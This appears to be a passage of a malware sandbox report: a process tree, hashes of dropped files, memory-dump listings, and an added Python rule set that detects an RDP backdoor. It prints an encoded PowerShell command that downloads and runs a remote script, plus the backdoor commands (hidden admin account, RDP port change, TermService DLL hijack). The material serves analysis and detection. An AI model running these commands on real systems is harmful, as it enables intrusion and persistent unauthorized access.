    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Flags: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
      Note: the -enc argument is base64 over UTF-16LE and decodes to IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config. This is pid 3992, the process behind the nine blocklisted network flows.
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C net user wgautilacc 1234
  - [2] C:\Windows\system32\net.exe
    Command line: net user wgautilacc 1234
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 1234
      Note: the backdoor account's password is first set to 6O7xHmag at creation and later reset to 1234.
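Every step of the RDP backdoor above is a plain command line (move the listener port, repoint TermService's ServiceDLL, add NETWORK SERVICE to Administrators, create wgautilacc and put it in Remote Desktop Users and Administrators), so it can be caught from process-creation telemetry without any file or memory analysis. The following is an added example, not part of this sandbox report: a few command-line rules run over events constructed from the command lines in the tree (image name plus command line only; parent/child context is ignored so the same rules apply to Sysmon event 1, Security 4688 with command-line auditing, or EDR feeds). Treating any TermService ServiceDLL outside %SystemRoot%\System32 as a hijack is the example's own assumption, as is the choice of which groups count as sensitive.

```python
"""Flag the RDP-backdoor command lines seen in this report's process tree.

Added example, not part of the sandbox report. EVENTS is constructed from
command lines copied out of the tree above as (image name, command line).
"""
from __future__ import annotations

import re

# Constructed from the process tree; the last entry is a control that should not fire.
EVENTS = [
    ("reg.exe", r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'),
    ("reg.exe", r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'),
    ("reg.exe", r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f'),
    ("net.exe", r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'),
    ("net.exe", r"net.exe user wgautilacc Ghar4f5 /del"),
    ("net.exe", r"net.exe user wgautilacc 6O7xHmag /add"),
    ("net.exe", r'net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD'),
    ("net.exe", r'net.exe LOCALGROUP "Administrators" wgautilacc /ADD'),
    ("net.exe", r"net user wgautilacc 1234"),
    ("net.exe", r"net start TermService"),
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# Assumption of this example: only these groups count as sensitive.
SENSITIVE_GROUPS = ("administrators", "remote desktop users")
# Assumption of this example: a TermService DLL anywhere else is a hijack.
LEGIT_DLL_DIRS = ("%systemroot%\\system32\\", "c:\\windows\\system32\\")


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def parse_reg_add(tokens: list[str]):
    """(key, value name, data) for `reg add KEY /v NAME ... /d DATA`, else None."""
    if len(tokens) < 3 or tokens[1].lower() != "add":
        return None
    opts: dict[str, str] = {}
    i = 3
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag == "/f":                      # /f takes no argument
            i += 1
        elif flag.startswith("/") and i + 1 < len(tokens):
            opts[flag] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return tokens[2], opts.get("/v", ""), opts.get("/d", "")


def analyse(image: str, cmdline: str) -> list[str]:
    """Findings for one process-creation event; empty list when nothing matches."""
    findings: list[str] = []
    t = tokenize(cmdline)
    if image.lower() == "reg.exe":
        parsed = parse_reg_add(t)
        if parsed is None:
            return findings
        key, name, data = parsed
        k, n = key.lower(), name.lower()
        if k.endswith(r"winstations\rdp-tcp") and n == "portnumber":
            try:
                findings.append(f"RDP listener port changed to {int(data, 0)}")  # int(..., 0) reads 0x1C21
            except ValueError:
                findings.append(f"RDP listener port changed to {data}")
        if r"\services\termservice\parameters" in k and n == "servicedll":
            if not data.lower().startswith(LEGIT_DLL_DIRS):
                findings.append(f"TermService ServiceDLL redirected to {data}")
        if k.endswith(r"windows nt\terminal services") and n == "fenablewddmdriver" and data == "0":
            findings.append("RDP WDDM display driver disabled")
    elif image.lower() == "net.exe":
        args = [x.lower() for x in t[1:]]
        if args[:1] == ["user"] and len(args) >= 3:
            if "/add" in args:
                findings.append(f"local account created: {t[2]}")
            elif "/del" in args or "/delete" in args:
                findings.append(f"local account deleted: {t[2]}")
            elif len(args) == 3 and not args[2].startswith("/"):
                findings.append(f"password set for local account: {t[2]}")
        if args[:1] == ["localgroup"] and "/add" in args and len(args) >= 4:
            if args[1] in SENSITIVE_GROUPS:
                findings.append(f"{t[3]} added to {t[2]}")
    return findings


def scan(events) -> list[str]:
    """Run the rules over (image, cmdline) pairs and return all findings in order."""
    out: list[str] = []
    for image, cmdline in events:
        out.extend(analyse(image, cmdline))
    return out


def rdp_backdoor_chain(findings: list[str]) -> bool:
    """The combination this sample shows: hidden RDP port, hijacked TermService
    DLL, and an account pushed into a sensitive group."""
    has_port = any(f.startswith("RDP listener port changed") for f in findings)
    has_dll = any(f.startswith("TermService ServiceDLL redirected") for f in findings)
    has_group = any(" added to " in f for f in findings)
    return has_port and has_dll and has_group


if __name__ == "__main__":
    results = scan(EVENTS)
    for line in results:
        print(line)
    print("RDP backdoor chain:", rdp_backdoor_chain(results))
```

Each rule alone is noisy in an enterprise (administrators do add users to Remote Desktop Users); the value is in the correlation, so alert on `rdp_backdoor_chain` per host within a short window and treat the individual findings as context. The `net1.exe` children carry the same arguments as their `net.exe` parents, so match on one image or the other, not both, or every hit doubles.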
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
4d0cb7fa714bb6b8b113319c5f37734d
SHA178fb1052d8fa35592e0f6103378658478c8d1385
SHA256469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845
SHA512b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c
-
C:\Users\Admin\AppData\Local\Temp\RESFD03.tmpMD5
d548bfd3e9739e99cea9a091caa3f42a
SHA112d057dd4af7393c06c303f56c76ed253f35d17d
SHA256cd729a85d094c21960d12d9df5a99de7d60217b557bb22acc44911caac56e2f1
SHA5121acb0a3ec81cc58f8f66f91711fd1bfdf1786d1e8c49541c5600de76db56ffb5471d3c82efdcd95e1a938b5c0693f4a71ff997ac4f6b61fbae58999224ddc889
-
C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 065cc96fec70546c9f195f703e4d657b
SHA1 9da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256 cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512 a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
C:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.dll
MD5 227ab471b2d31d2af7de9d70aa15d027
SHA1 b8569d95971ddd569ff27d838a7f14cea477c908
SHA256 d800dce46bcbfe4b2732c66b5eebc860fcef509041e45aa9d937e703944f6a7c
SHA512 60c19485a2f8770fbb29370743b1c9ac7933455a40fb6a8780db178bfb7083e867d69962330a24af9f4b8891154503995d11b04f187d1b84965f63a9f66f5ded
-
\??\c:\Users\Admin\AppData\Local\Temp\wqatwvkc\CSC446953FD1A4041BE8C3F48E23DEBDDFA.TMP
MD5 ff2547bdc497773394e21ad1fe844162
SHA1 0811f0922ad0bfdfd7313569ab51905f95b49132
SHA256 462a98360f3f98877baae4a312e9dcab0a65da267983765ae772c9391b69dc2f
SHA512 605b39add9ebf60e1d23bd1c9b7988cef9a430e0b7d3f0fb2618444bbf7d1f59ed5fd99dd7ce25354eabe4186e99cd4197ed594a1069616cf490233fb19e6eab
-
\??\c:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.0.cs
MD5 df390bc8a088b51d27253fed32186361
SHA1 69e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA256 4388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA512 4d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.cmdline
MD5 1acc5bab4f01fe9396df6ee8c927fb72
SHA1 8da892ff5638288c7aec033edf07974b7cded80d
SHA256 ea3dc9cf6655cedcb38ab28f2a909003052168df56bf63c17671beb9fd660c07
SHA512 cfff0d78c23de2ca39f605fbb1cb52dcbe0cc9ed6ed8a1ec58667f9ed0bc73cd94e575a320c6260b93df573740b993ba85b64b99931a82fc283080822c182d68
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.png
MD5 ee8186ae8d2615ee4a859007556227ec
SHA1 0125a0caaf2ff3da1266f1893cf051ddca6460fa
SHA256 96de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f
SHA512 2eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612
-
\Windows\Branding\mediasvc.png
MD5 7a8bf878d6438e28822cb499cb7da107
SHA1 36cbc7c1b2da094b773614d251704e4c2bb0e88e
SHA256 9aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63
SHA512 6c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee
-
memory/544-228-0x0000000000000000-mapping.dmp
-
memory/808-230-0x0000000000000000-mapping.dmp
-
memory/808-114-0x0000000002230000-0x00000000022C1000-memory.dmp
Filesize 580KB
-
memory/808-115-0x0000000000400000-0x0000000000496000-memory.dmp
Filesize 600KB
-
memory/812-246-0x0000000000000000-mapping.dmp
-
memory/812-254-0x0000000000000000-mapping.dmp
-
memory/1148-174-0x000001A6F3C63000-0x000001A6F3C65000-memory.dmp
Filesize 8KB
-
memory/1148-173-0x000001A6F3C60000-0x000001A6F3C62000-memory.dmp
Filesize 8KB
-
memory/1148-168-0x0000000000000000-mapping.dmp
-
memory/1148-204-0x000001A6F3C66000-0x000001A6F3C68000-memory.dmp
Filesize 8KB
-
memory/1148-208-0x000001A6F3C68000-0x000001A6F3C6A000-memory.dmp
Filesize 8KB
-
memory/1204-241-0x0000000000000000-mapping.dmp
-
memory/1204-257-0x0000000000000000-mapping.dmp
-
memory/1504-219-0x0000000000000000-mapping.dmp
-
memory/1972-122-0x00000191F1EA0000-0x00000191F22C1000-memory.dmp
Filesize 4.1MB
-
memory/1972-117-0x0000000000000000-mapping.dmp
-
memory/1972-124-0x00000191F1A60000-0x00000191F1A62000-memory.dmp
Filesize 8KB
-
memory/1972-125-0x00000191F1A63000-0x00000191F1A65000-memory.dmp
Filesize 8KB
-
memory/1972-126-0x00000191F1A65000-0x00000191F1A66000-memory.dmp
Filesize 4KB
-
memory/1972-127-0x00000191F1A66000-0x00000191F1A67000-memory.dmp
Filesize 4KB
-
memory/2016-235-0x0000000000000000-mapping.dmp
-
memory/2052-138-0x000001E9FB7E0000-0x000001E9FB7E2000-memory.dmp
Filesize 8KB
-
memory/2052-154-0x000001E9FB600000-0x000001E9FB601000-memory.dmp
Filesize 4KB
-
memory/2052-139-0x000001E9FB7E3000-0x000001E9FB7E5000-memory.dmp
Filesize 8KB
-
memory/2052-160-0x000001E9FC790000-0x000001E9FC791000-memory.dmp
Filesize 4KB
-
memory/2052-218-0x000001E9FB7E8000-0x000001E9FB7E9000-memory.dmp
Filesize 4KB
-
memory/2052-128-0x0000000000000000-mapping.dmp
-
memory/2052-137-0x000001E9FC180000-0x000001E9FC181000-memory.dmp
Filesize 4KB
-
memory/2052-147-0x000001E9FB7E6000-0x000001E9FB7E8000-memory.dmp
Filesize 8KB
-
memory/2052-134-0x000001E9FB470000-0x000001E9FB471000-memory.dmp
Filesize 4KB
-
memory/2052-161-0x000001E9FCB20000-0x000001E9FCB21000-memory.dmp
Filesize 4KB
-
memory/2076-220-0x0000000000000000-mapping.dmp
-
memory/2252-226-0x0000000000000000-mapping.dmp
-
memory/2268-247-0x0000000000000000-mapping.dmp
-
memory/2268-243-0x0000000000000000-mapping.dmp
-
memory/2272-121-0x0000000000000000-mapping.dmp
-
memory/2272-237-0x0000000000000000-mapping.dmp
-
memory/2276-248-0x0000000000000000-mapping.dmp
-
memory/2284-222-0x0000000000000000-mapping.dmp
-
memory/2620-231-0x0000000000000000-mapping.dmp
-
memory/2680-223-0x0000000000000000-mapping.dmp
-
memory/2700-227-0x0000000000000000-mapping.dmp
-
memory/2768-240-0x0000000000000000-mapping.dmp
-
memory/2884-239-0x0000000000000000-mapping.dmp
-
memory/2940-221-0x0000000000000000-mapping.dmp
-
memory/3100-209-0x000001B7F2BF0000-0x000001B7F2BF2000-memory.dmp
Filesize 8KB
-
memory/3100-207-0x0000000000000000-mapping.dmp
-
memory/3100-210-0x000001B7F2BF3000-0x000001B7F2BF5000-memory.dmp
Filesize 8KB
-
memory/3100-213-0x000001B7F2BF8000-0x000001B7F2BFA000-memory.dmp
Filesize 8KB
-
memory/3100-212-0x000001B7F2BF6000-0x000001B7F2BF8000-memory.dmp
Filesize 8KB
-
memory/3144-225-0x0000000000000000-mapping.dmp
-
memory/3156-244-0x0000000000000000-mapping.dmp
-
memory/3240-224-0x0000000000000000-mapping.dmp
-
memory/3240-146-0x0000000000000000-mapping.dmp
-
memory/3272-229-0x0000000000000000-mapping.dmp
-
memory/3348-215-0x0000022DBEFF3000-0x0000022DBEFF5000-memory.dmp
Filesize 8KB
-
memory/3348-211-0x0000000000000000-mapping.dmp
-
memory/3348-214-0x0000022DBEFF0000-0x0000022DBEFF2000-memory.dmp
Filesize 8KB
-
memory/3348-216-0x0000022DBEFF6000-0x0000022DBEFF8000-memory.dmp
Filesize 8KB
-
memory/3348-217-0x0000022DBEFF8000-0x0000022DBEFFA000-memory.dmp
Filesize 8KB
-
memory/3352-255-0x0000000000000000-mapping.dmp
-
memory/3364-120-0x0000000000000000-mapping.dmp
-
memory/3432-238-0x0000000000000000-mapping.dmp
-
memory/3500-242-0x0000000000000000-mapping.dmp
-
memory/3588-245-0x0000000000000000-mapping.dmp
-
memory/3660-234-0x0000000000000000-mapping.dmp
-
memory/3708-150-0x0000000000000000-mapping.dmp
-
memory/3708-236-0x0000000000000000-mapping.dmp
-
memory/3708-256-0x0000000000000000-mapping.dmp
-
memory/3992-251-0x000001A4FAC63000-0x000001A4FAC65000-memory.dmp
Filesize 8KB
-
memory/3992-253-0x000001A4FAC68000-0x000001A4FAC69000-memory.dmp
Filesize 4KB
-
memory/3992-252-0x000001A4FAC66000-0x000001A4FAC68000-memory.dmp
Filesize 8KB
-
memory/3992-250-0x000001A4FAC60000-0x000001A4FAC62000-memory.dmp
Filesize 8KB
-
memory/3992-249-0x0000000000000000-mapping.dmp